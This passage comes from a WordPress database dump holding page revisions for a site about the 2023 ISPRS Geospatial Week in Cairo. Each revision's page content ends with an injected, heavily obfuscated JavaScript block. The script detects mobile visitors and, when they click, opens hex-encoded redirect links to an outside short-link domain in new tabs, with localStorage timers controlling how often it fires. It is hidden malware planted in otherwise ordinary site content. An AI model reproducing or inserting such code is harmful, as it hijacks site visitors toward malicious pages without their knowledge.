)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:37:11','2022-11-08 22:37:11','',3066,'https://gsw2023.com/?p=3100',0,'revision','',0),
(3101,1,'2022-11-08 22:41:08','2022-11-08 22:41:08','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:41:08','2022-11-08 22:41:08','',3066,'https://gsw2023.com/?p=3101',0,'revision','',0),
(3102,1,'2022-11-08 22:41:33','2022-11-08 22:41:33','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 